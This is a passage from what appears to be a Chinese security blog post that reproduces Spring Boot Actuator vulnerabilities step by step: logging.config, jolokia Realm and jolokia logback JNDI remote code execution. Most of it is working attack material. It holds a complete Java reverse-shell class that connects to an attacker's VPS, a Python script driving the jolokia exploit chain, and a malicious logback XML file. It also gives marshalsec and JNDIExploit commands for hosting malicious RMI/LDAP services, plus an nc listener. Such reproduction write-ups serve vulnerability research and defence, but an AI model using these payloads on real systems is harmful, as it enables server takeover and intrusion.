<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">POST /env</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line"></span><br><span class="line">logging.config=http://your-vps-ip/example.xml</span><br></pre></td></tr></table></figure>

<p>spring 2.x</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">POST /actuator/env</span><br><span class="line">Content-Type: application/json</span><br><span class="line"></span><br><span class="line">&#123;&quot;name&quot;:&quot;logging.config&quot;,&quot;value&quot;:&quot;http://your-vps-ip/example.xml&quot;&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/img_convert/28ead6c984014e077070ea26b118d7f8.png" alt="image-20220106104030240"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/cc8756c5571cc21eed9bf56279cbbf3d.png" alt="image-20220106104041591"></p>
<h3 id="步骤四：重启应用"><a href="#步骤四：重启应用" class="headerlink" title="步骤四：重启应用"></a>步骤四：重启应用</h3><p>spring 1.x</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">POST /restart</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>spring 2.x</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">POST /actuator/restart</span><br><span class="line">Content-Type: application/json</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/img_convert/797f87c8cb5430b70981a1a2a2e2be59.png" alt="image-20220106104137651"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/126d130441612bed777b368421c0bb62.png" alt="image-20220106104146393"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/3b3dfc3b3b06dd2a00c7ce9300391e91.png" alt="image-20220106105457183"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/e23e570aeb09f702ee779bcad0d3a7d4.png" alt="image-20220106105418120"></p>
<h2 id="4-漏洞原理："><a href="#4-漏洞原理：" class="headerlink" title="4 漏洞原理："></a>4 漏洞原理：</h2><ol>
<li>目标机器通过 logging.config 属性设置 logback 日志配置文件 URL 地址</li>
<li>restart 重启应用后，程序会请求 URL 地址获得恶意 xml 文件内容</li>
<li>目标机器使用 saxParser.parse 解析 xml 文件 (这里导致了 xxe 漏洞)</li>
<li>xml 文件中利用 <code>logback</code> 依赖的 <code>insertFormJNDI</code> 标签，设置了外部 JNDI 服务器地址</li>
<li>目标机器请求恶意 JNDI 服务器，导致 JNDI 注入，造成 RCE 漏洞</li>
</ol>
<h1 id="Springboot-jolokia-Realm-JNDI-RCE"><a href="#Springboot-jolokia-Realm-JNDI-RCE" class="headerlink" title="Springboot jolokia Realm JNDI RCE"></a>Springboot jolokia Realm JNDI RCE</h1><h2 id="1-正常访问："><a href="#1-正常访问：" class="headerlink" title="1 正常访问："></a>1 正常访问：</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1:9094/env</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/img_convert/709086ada9a072b3a631629b6a8db2e3.png" alt="image-20220126103125692"></p>
<h2 id="2-利用条件："><a href="#2-利用条件：" class="headerlink" title="2 利用条件："></a>2 利用条件：</h2><ul>
<li>目标网站存在 <code>/jolokia</code> 或 <code>/actuator/jolokia</code> 接口</li>
<li>目标使用了 <code>jolokia-core</code> 依赖（版本要求暂未知）并且环境中存在相关 MBean</li>
<li>目标可以请求攻击者的服务器（请求可出外网）</li>
<li>普通 JNDI 注入受目标 JDK 版本影响，jdk &lt; 6u141&#x2F;7u131&#x2F;8u121(RMI)，但相关环境可绕过</li>
</ul>
<p><img src="https://img-blog.csdnimg.cn/img_convert/578f76db80c52dbf17703de5a24fd35e.png" alt="image-20220126103151134"></p>
<h2 id="3-利用方法："><a href="#3-利用方法：" class="headerlink" title="3 利用方法："></a>3 利用方法：</h2><h3 id="步骤一：查看已存在的-MBeans"><a href="#步骤一：查看已存在的-MBeans" class="headerlink" title="步骤一：查看已存在的 MBeans"></a>步骤一：查看已存在的 MBeans</h3><p>访问 <code>/jolokia/list</code> 接口，查看是否存在 <code>type=MBeanFactory</code> 和 <code>createJNDIRealm</code> 关键词。</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/41053aadb601abe0e153eeb0ddd4d133.png" alt="image-20220126103236857"></p>
<h3 id="步骤二：准备要执行的-Java-代码"><a href="#步骤二：准备要执行的-Java-代码" class="headerlink" title="步骤二：准备要执行的 Java 代码"></a>步骤二：准备要执行的 Java 代码</h3><p>编写优化过后的用来反弹 shell 的Java 示例代码 <code>JNDIObject.java</code>。</p>
<p>把 JNDIObject.java 编译成 class文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">javac -source 1.5 -target 1.5 /Users/zy/Desktop/JNDIObject.java</span><br></pre></td></tr></table></figure>

<p>修改反弹shell的字段</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">String ip = &quot;110.110.110.110&quot;;</span><br><span class="line">String port = &quot;4443&quot;;</span><br></pre></td></tr></table></figure>

<p>代码：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> *  javac -source 1.5 -target 1.5 JNDIObject.java</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *  Build By LandGrey</span></span><br><span class="line"><span class="comment"> * */</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.File;</span><br><span class="line"><span class="keyword">import</span> java.io.InputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.OutputStream;</span><br><span class="line"><span class="keyword">import</span> java.net.Socket;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">JNDIObject</span> &#123;</span><br><span class="line">    <span class="keyword">static</span> &#123;</span><br><span class="line">        <span class="keyword">try</span>&#123;</span><br><span class="line">            <span class="type">String</span> <span class="variable">ip</span> <span class="operator">=</span> <span class="string">&quot;your-vps-ip&quot;</span>;</span><br><span class="line">            <span class="type">String</span> <span class="variable">port</span> <span class="operator">=</span> <span class="string">&quot;443&quot;</span>;</span><br><span class="line">            <span class="type">String</span> <span class="variable">py_path</span> <span class="operator">=</span> <span class="literal">null</span>;</span><br><span class="line">            String[] cmd;</span><br><span class="line">            <span class="keyword">if</span> (!System.getProperty(<span class="string">&quot;os.name&quot;</span>).toLowerCase().contains(<span class="string">&quot;windows&quot;</span>)) &#123;</span><br><span class="line">                String[] py_envs = <span class="keyword">new</span> <span class="title class_">String</span>[]&#123;<span class="string">&quot;/bin/python&quot;</span>, <span class="string">&quot;/bin/python3&quot;</span>, <span class="string">&quot;/usr/bin/python&quot;</span>, <span class="string">&quot;/usr/bin/python3&quot;</span>, <span class="string">&quot;/usr/local/bin/python&quot;</span>, <span class="string">&quot;/usr/local/bin/python3&quot;</span>&#125;;</span><br><span class="line">                <span class="keyword">for</span>(<span class="type">int</span> <span class="variable">i</span> <span class="operator">=</span> <span class="number">0</span>; i &lt; py_envs.length; ++i) &#123;</span><br><span class="line">                    <span class="type">String</span> <span class="variable">py</span> <span class="operator">=</span> py_envs[i];</span><br><span class="line">                    <span class="keyword">if</span> ((<span class="keyword">new</span> <span class="title class_">File</span>(py)).exists()) &#123;</span><br><span class="line">                        py_path = py;</span><br><span class="line">                        <span class="keyword">break</span>;</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">if</span> (py_path != <span class="literal">null</span>) &#123;</span><br><span class="line">                    <span class="keyword">if</span> ((<span class="keyword">new</span> <span class="title class_">File</span>(<span class="string">&quot;/bin/bash&quot;</span>)).exists()) &#123;</span><br><span class="line">                        cmd = <span class="keyword">new</span> <span class="title class_">String</span>[]&#123;py_path, <span class="string">&quot;-c&quot;</span>, <span class="string">&quot;import pty;pty.spawn(\&quot;/bin/bash\&quot;)&quot;</span>&#125;;</span><br><span class="line">                    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                        cmd = <span class="keyword">new</span> <span class="title class_">String</span>[]&#123;py_path, <span class="string">&quot;-c&quot;</span>, <span class="string">&quot;import pty;pty.spawn(\&quot;/bin/sh\&quot;)&quot;</span>&#125;;</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                    <span class="keyword">if</span> ((<span class="keyword">new</span> <span class="title class_">File</span>(<span class="string">&quot;/bin/bash&quot;</span>)).exists()) &#123;</span><br><span class="line">                        cmd = <span class="keyword">new</span> <span class="title class_">String</span>[]&#123;<span class="string">&quot;/bin/bash&quot;</span>&#125;;</span><br><span class="line">                    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                        cmd = <span class="keyword">new</span> <span class="title class_">String</span>[]&#123;<span class="string">&quot;/bin/sh&quot;</span>&#125;;</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                cmd = <span class="keyword">new</span> <span class="title class_">String</span>[]&#123;<span class="string">&quot;cmd.exe&quot;</span>&#125;;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="type">Process</span> <span class="variable">p</span> <span class="operator">=</span> (<span class="keyword">new</span> <span class="title class_">ProcessBuilder</span>(cmd)).redirectErrorStream(<span class="literal">true</span>).start();</span><br><span class="line">            <span class="type">Socket</span> <span class="variable">s</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Socket</span>(ip, Integer.parseInt(port));</span><br><span class="line">            <span class="type">InputStream</span> <span class="variable">pi</span> <span class="operator">=</span> p.getInputStream();</span><br><span class="line">            <span class="type">InputStream</span> <span class="variable">pe</span> <span class="operator">=</span> p.getErrorStream();</span><br><span class="line">            <span class="type">InputStream</span> <span class="variable">si</span> <span class="operator">=</span> s.getInputStream();</span><br><span class="line">            <span class="type">OutputStream</span> <span class="variable">po</span> <span class="operator">=</span> p.getOutputStream();</span><br><span class="line">            <span class="type">OutputStream</span> <span class="variable">so</span> <span class="operator">=</span> s.getOutputStream();</span><br><span class="line">            <span class="keyword">while</span>(!s.isClosed()) &#123;</span><br><span class="line">                <span class="keyword">while</span>(pi.available() &gt; <span class="number">0</span>) &#123;</span><br><span class="line">                    so.write(pi.read());</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">while</span>(pe.available() &gt; <span class="number">0</span>) &#123;</span><br><span class="line">                    so.write(pe.read());</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">while</span>(si.available() &gt; <span class="number">0</span>) &#123;</span><br><span class="line">                    po.write(si.read());</span><br><span class="line">                &#125;</span><br><span class="line">                so.flush();</span><br><span class="line">                po.flush();</span><br><span class="line">                Thread.sleep(<span class="number">50L</span>);</span><br><span class="line">                <span class="keyword">try</span> &#123;</span><br><span class="line">                    p.exitValue();</span><br><span class="line">                    <span class="keyword">break</span>;</span><br><span class="line">                &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            p.destroy();</span><br><span class="line">            s.close();</span><br><span class="line">        &#125;<span class="keyword">catch</span> (Throwable e)&#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="步骤三：托管-class-文件"><a href="#步骤三：托管-class-文件" class="headerlink" title="步骤三：托管 class 文件"></a>步骤三：托管 class 文件</h3><p>在自己控制的 vps 机器上开启一个简单 HTTP 服务器，端口尽量使用常见 HTTP 服务端口（80、443）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 使用 python 快速开启 http server</span></span><br><span class="line"></span><br><span class="line">python2 -m SimpleHTTPServer 80</span><br><span class="line">python3 -m http.server 80</span><br></pre></td></tr></table></figure>

<p>将<strong>步骤二</strong>中编译好的 class 文件拷贝到 HTTP 服务器根目录。</p>
<h3 id="步骤四：架设恶意-rmi-服务"><a href="#步骤四：架设恶意-rmi-服务" class="headerlink" title="步骤四：架设恶意 rmi 服务"></a>步骤四：架设恶意 rmi 服务</h3><p>下载 marshalsec<a target="_blank" rel="noopener" href="https://github.com/mbechler/marshalsec%EF%BC%8C%E4%BD%BF%E7%94%A8%E4%B8%8B%E9%9D%A2%E5%91%BD%E4%BB%A4%E6%9E%B6%E8%AE%BE%E5%AF%B9%E5%BA%94%E7%9A%84">https://github.com/mbechler/marshalsec，使用下面命令架设对应的</a> rmi 服务：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -<span class="built_in">cp</span> marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://110.110.110.110:88/<span class="comment">#JNDIObject 1389</span></span><br></pre></td></tr></table></figure>

<h3 id="步骤五：监听反弹-shell-的端口"><a href="#步骤五：监听反弹-shell-的端口" class="headerlink" title="步骤五：监听反弹 shell 的端口"></a>步骤五：监听反弹 shell 的端口</h3><p>一般使用 nc 监听端口，等待反弹 shell</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvp 4443</span><br></pre></td></tr></table></figure>

<h3 id="步骤六：发送恶意-payload"><a href="#步骤六：发送恶意-payload" class="headerlink" title="步骤六：发送恶意 payload"></a>步骤六：发送恶意 payload</h3><p>根据实际情况修改脚本中的目标地址，RMI 地址、端口等信息，然后在自己控制的服务器上运行。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">需要修改的地方</span><br><span class="line">url = &#x27;http://127.0.0.1:9094/jolokia/&#x27;</span><br><span class="line">&quot;value&quot;: &quot;rmi://110.110.110.110:1389/JNDIObject&quot;</span><br></pre></td></tr></table></figure>

<p>代码：springboot-realm-jndi-rce.py</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">url = <span class="string">&#x27;http://127.0.0.1:9094/jolokia/&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">create_realm = &#123;</span><br><span class="line">    <span class="string">&quot;mbean&quot;</span>: <span class="string">&quot;Tomcat:type=MBeanFactory&quot;</span>,</span><br><span class="line">    <span class="string">&quot;type&quot;</span>: <span class="string">&quot;EXEC&quot;</span>,</span><br><span class="line">    <span class="string">&quot;operation&quot;</span>: <span class="string">&quot;createJNDIRealm&quot;</span>,</span><br><span class="line">    <span class="string">&quot;arguments&quot;</span>: [<span class="string">&quot;Tomcat:type=Engine&quot;</span>]</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">wirte_factory = &#123;</span><br><span class="line">    <span class="string">&quot;mbean&quot;</span>: <span class="string">&quot;Tomcat:realmPath=/realm0,type=Realm&quot;</span>,</span><br><span class="line">    <span class="string">&quot;type&quot;</span>: <span class="string">&quot;WRITE&quot;</span>,</span><br><span class="line">    <span class="string">&quot;attribute&quot;</span>: <span class="string">&quot;contextFactory&quot;</span>,</span><br><span class="line">    <span class="string">&quot;value&quot;</span>: <span class="string">&quot;com.sun.jndi.rmi.registry.RegistryContextFactory&quot;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">write_url = &#123;</span><br><span class="line">    <span class="string">&quot;mbean&quot;</span>: <span class="string">&quot;Tomcat:realmPath=/realm0,type=Realm&quot;</span>,</span><br><span class="line">    <span class="string">&quot;type&quot;</span>: <span class="string">&quot;WRITE&quot;</span>,</span><br><span class="line">    <span class="string">&quot;attribute&quot;</span>: <span class="string">&quot;connectionURL&quot;</span>,</span><br><span class="line">    <span class="string">&quot;value&quot;</span>: <span class="string">&quot;rmi://110.110.110.110:1389/JNDIObject&quot;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">stop = &#123;</span><br><span class="line">    <span class="string">&quot;mbean&quot;</span>: <span class="string">&quot;Tomcat:realmPath=/realm0,type=Realm&quot;</span>,</span><br><span class="line">    <span class="string">&quot;type&quot;</span>: <span class="string">&quot;EXEC&quot;</span>,</span><br><span class="line">    <span class="string">&quot;operation&quot;</span>: <span class="string">&quot;stop&quot;</span>,</span><br><span class="line">    <span class="string">&quot;arguments&quot;</span>: []</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">start = &#123;</span><br><span class="line">    <span class="string">&quot;mbean&quot;</span>: <span class="string">&quot;Tomcat:realmPath=/realm0,type=Realm&quot;</span>,</span><br><span class="line">    <span class="string">&quot;type&quot;</span>: <span class="string">&quot;EXEC&quot;</span>,</span><br><span class="line">    <span class="string">&quot;operation&quot;</span>: <span class="string">&quot;start&quot;</span>,</span><br><span class="line">    <span class="string">&quot;arguments&quot;</span>: []</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">flow = [create_realm, wirte_factory, write_url, stop, start]</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> flow:</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&#x27;%s MBean %s: %s ...&#x27;</span> % (i[<span class="string">&#x27;type&#x27;</span>].title(), i[<span class="string">&#x27;mbean&#x27;</span>], i.get(<span class="string">&#x27;operation&#x27;</span>, i.get(<span class="string">&#x27;attribute&#x27;</span>))))</span><br><span class="line">    r = requests.post(url, json=i)</span><br><span class="line">    r.json()</span><br><span class="line">    <span class="built_in">print</span>(r.status_code)</span><br></pre></td></tr></table></figure>

<p>运行python文件</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/cab2bc8b84c0f2b96591b815910cf0ca.png" alt="image-20220126142733040"></p>
<p>RMI服务收到请求</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/b56473b013827dccb7e516abaa8bf47e.png" alt="image-20220126141535653"></p>
<p>VPS接收到反弹的shell</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/d39eea3b4dd8e3a69a161a1f7a9e96a3.png" alt="image-20220126141801956"></p>
<h2 id="4-漏洞原理：-1"><a href="#4-漏洞原理：-1" class="headerlink" title="4 漏洞原理："></a>4 漏洞原理：</h2><ol>
<li>利用 jolokia 调用 createJNDIRealm 创建 JNDIRealm</li>
<li>设置 connectionURL 地址为 RMI Service URL</li>
<li>设置 contextFactory 为 RegistryContextFactory</li>
<li>停止 Realm</li>
<li>启动 Realm 以触发指定 RMI 地址的 JNDI 注入，造成 RCE 漏洞</li>
</ol>
<h1 id="Springboot-jolokia-logback-JNDI-RCE"><a href="#Springboot-jolokia-logback-JNDI-RCE" class="headerlink" title="Springboot jolokia logback JNDI RCE"></a>Springboot jolokia logback JNDI RCE</h1><h2 id="1-漏洞环境-正常访问："><a href="#1-漏洞环境-正常访问：" class="headerlink" title="1 漏洞环境,正常访问："></a>1 漏洞环境,正常访问：</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1:9094/env</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/img_convert/65712e89358130843912001a2aaeba79.png" alt="image-20220126092951280"></p>
<h2 id="2-利用条件：-1"><a href="#2-利用条件：-1" class="headerlink" title="2 利用条件："></a>2 利用条件：</h2><ul>
<li><p>目标网站存在 <code>/jolokia</code> 或 <code>/actuator/jolokia</code> 接口</p>
</li>
<li><p>目标使用了 <code>jolokia-core</code> 依赖（版本要求暂未知）并且环境中存在相关 MBean</p>
</li>
<li><p>目标可以请求攻击者的 HTTP 服务器（请求可出外网）</p>
<ul>
<li>普通 JNDI 注入受目标 JDK 版本影响，jdk &lt; 6u201&#x2F;7u191&#x2F;8u182&#x2F;11.0.1(LDAP)，但相关环境可绕过</li>
</ul>
</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1:9094/jolokia</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/img_convert/b1d5137381e44c8fea2b36c276b291b9.png" alt="image-20220126093044846"></p>
<h2 id="3-利用方法：-1"><a href="#3-利用方法：-1" class="headerlink" title="3 利用方法："></a>3 利用方法：</h2><h3 id="步骤一：查看已存在的-MBeans-1"><a href="#步骤一：查看已存在的-MBeans-1" class="headerlink" title="步骤一：查看已存在的 MBeans"></a>步骤一：查看已存在的 MBeans</h3><p>访问 <code>/jolokia/list</code> 接口，查看是否存在 <code>ch.qos.logback.classic.jmx.JMXConfigurator</code> 和 <code>reloadByURL</code> 关键词。</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/dbeada69623a9ab2e10b78c06c85d8d6.png" alt="image-20220126094044156"></p>
<h3 id="步骤二：托管-xml-文件"><a href="#步骤二：托管-xml-文件" class="headerlink" title="步骤二：托管 xml 文件"></a>步骤二：托管 xml 文件</h3><p>在自己控制的 vps 机器上开启一个简单 HTTP 服务器，端口尽量使用常见 HTTP 服务端口（80、443）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 使用 python 快速开启 http server</span></span><br><span class="line"></span><br><span class="line">python2 -m SimpleHTTPServer 80</span><br><span class="line">python3 -m http.server 80</span><br></pre></td></tr></table></figure>

<p>在根目录放置以 <code>xml</code> 结尾的 <code>example.xml</code> 文件，内容如下：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">configuration</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">insertFromJNDI</span> <span class="attr">env-entry-name</span>=<span class="string">&quot;ldap://your-vps-ip:1389/JNDIObject&quot;</span> <span class="attr">as</span>=<span class="string">&quot;appName&quot;</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">configuration</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="步骤三：架设恶意-ldap-服务"><a href="#步骤三：架设恶意-ldap-服务" class="headerlink" title="步骤三：架设恶意 ldap 服务"></a>步骤三：架设恶意 ldap 服务</h3><p>下载 JNDIExploit，使用下面命令架设对应的 ldap 服务：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar JNDIExploit-1.3-SNAPSHOT.jar</span><br></pre></td></tr></table></figure>

<h3 id="步骤四：从外部-URL-地址加载日志配置文件"><a href="#步骤四：从外部-URL-地址加载日志配置文件" class="headerlink" title="步骤四：从外部 URL 地址加载日志配置文件"></a>步骤四：从外部 URL 地址加载日志配置文件</h3><p>替换实际的 your-vps-ip 地址访问 URL 触发漏洞：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">注意payload种URL</span><br><span class="line">http:!/!/your-vps-ip!/example.xml</span><br><span class="line">其中 / 都是 !/ 替代的</span><br></pre></td></tr></table></figure>

<p>PAYLOAD</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/your-vps-ip!/example.xml</span><br></pre></td></tr></table></figure>

<p>HTTP请求收到请求</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/e2be7c18ccc25c38119941a793e0d99d.png" alt="image-20220126101113887"></p>
<p>JNDI收到请求</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/5f42cdf0ca5bc86cbba901907eda8b2f.png" alt="image-20220126101008425"></p>
<p>成功命令执行</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/bc47ba3b50b0da8133e255558c8df3fb.png" alt="image-20220126100454427"></p>
<blockquote>
<p>⚠️ 如果目标成功请求了example.xml 并且 marshalsec 也接收到了目标请求，但是目标没有请求 JNDIObject.class，大概率是因为目标环境的 jdk 版本太高，导致 JNDI 利用失败。</p>
</blockquote>
<h2 id="4-漏洞原理：-2"><a href="#4-漏洞原理：-2" class="headerlink" title="4 漏洞原理："></a>4 漏洞原理：</h2><ol>
<li>直接访问可触发漏洞的 URL，相当于通过 jolokia 调用 <code>ch.qos.logback.classic.jmx.JMXConfigurator</code> 类的 <code>reloadByURL</code> 方法</li>
<li>目标机器请求外部日志配置文件 URL 地址，获得恶意 xml 文件内容</li>
<li>目标机器使用 saxParser.parse 解析 xml 文件 (这里导致了 xxe 漏洞)</li>
<li>xml 文件中利用 <code>logback</code> 依赖的 <code>insertFormJNDI</code> 标签，设置了外部 JNDI 服务器地址</li>
<li>目标机器请求恶意 JNDI 服务器，导致 JNDI 注入，造成 RCE 漏洞</li>
</ol>
<p>Spring Boot Actuator 漏洞复现合集.md</p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="https://godzeo.github.io">Zeo</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://godzeo.github.io/2022/02/09/Spring%20Boot%20Actuator%20%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86/">https://godzeo.github.io/2022/02/09/Spring%20Boot%20Actuator%20%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://godzeo.github.io" target="_blank">Zeo's Security Lab</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" 